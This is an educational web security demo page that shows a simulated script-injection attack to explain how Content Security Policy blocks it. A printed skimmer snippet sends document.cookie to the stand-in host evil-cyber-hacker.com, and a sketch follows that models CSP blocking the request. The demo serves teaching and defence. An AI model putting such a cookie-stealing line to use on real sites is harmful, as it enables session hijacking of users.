⚠️ No CSP — this page is unprotected
CSP Demo 1 of 4

Malicious Script Injection

An attacker has injected a script that silently exfiltrates your session data. See how CSP stops it cold.

Attack in progress — malicious script is running

My Account

Logged in as [email protected]

🚨 Attack succeeded. The injected script has read your session token and sent it to evil-cyber-hacker.com.

💡 Open DevTools → Network tab to see the beacon request to evil-cyber-hacker.com.

// injected-skimmer.js (loaded from evil-cyber-hacker.com)
fetch('https://evil-cyber-hacker.com/steal', {
  method: 'POST',
  body: 'token=' + document.cookie
});

What's happening

Without CSP, the browser has no way to know that this script shouldn't be here. It was injected via a compromised ad, a third-party widget, or an XSS vulnerability — and the browser executes it without question.
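As an added example (not code from this demo), the sketch below models how a browser would treat the two requests this attack depends on, the skimmer script load and the beacon to /steal, with and without a Content-Security-Policy header. The page origin https://shop.example, the skimmer's URL path, /app.js and the policy itself are assumptions, and the matcher is simplified to 'self', 'none' and exact-origin sources.

```javascript
// Added example: simplified model of CSP checks (exact-origin, 'self' and 'none' only;
// no wildcards, scheme-less hosts, nonces or hashes).
const PAGE_ORIGIN = 'https://shop.example'; // assumed origin of the "My Account" page

// Assumed policy, as it would appear in the Content-Security-Policy response header.
const POLICY = "default-src 'self'; script-src 'self'; connect-src 'self'";

// Parse "name src src; name src" into { name: [src, ...] }.
// As in browsers, the first occurrence of a directive wins; repeats are ignored.
function parsePolicy(header) {
  const directives = Object.create(null);
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    if (key && !(key in directives)) directives[key] = sources;
  }
  return directives;
}

// Would a request governed by `directive` (e.g. 'script-src') to `url` be allowed?
function isAllowed(directives, directive, url, pageOrigin) {
  const sources = directives[directive] ?? directives['default-src'];
  if (sources === undefined) return true; // nothing restricts this request type
  const target = new URL(url, pageOrigin).origin;
  return sources.some((src) => {
    if (src === "'self'") return target === pageOrigin;
    if (src.startsWith("'")) return false; // 'none' and keywords this model ignores
    try { return new URL(src).origin === target; } catch { return false; }
  });
}

// The two requests the attack on this page depends on, plus one legitimate script.
function checkAttack(header) {
  const d = parsePolicy(header);
  return {
    // path of the skimmer on the attacker's host is assumed
    skimmerLoads: isAllowed(d, 'script-src', 'https://evil-cyber-hacker.com/injected-skimmer.js', PAGE_ORIGIN),
    beaconSent: isAllowed(d, 'connect-src', 'https://evil-cyber-hacker.com/steal', PAGE_ORIGIN),
    ownScriptLoads: isAllowed(d, 'script-src', '/app.js', PAGE_ORIGIN), // assumed first-party script
  };
}

console.log('no CSP  :', checkAttack(''));
console.log('with CSP:', checkAttack(POLICY));
```

Either directive alone breaks the attack: script-src keeps the skimmer from loading, and connect-src blocks the beacon even if a script does get in.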
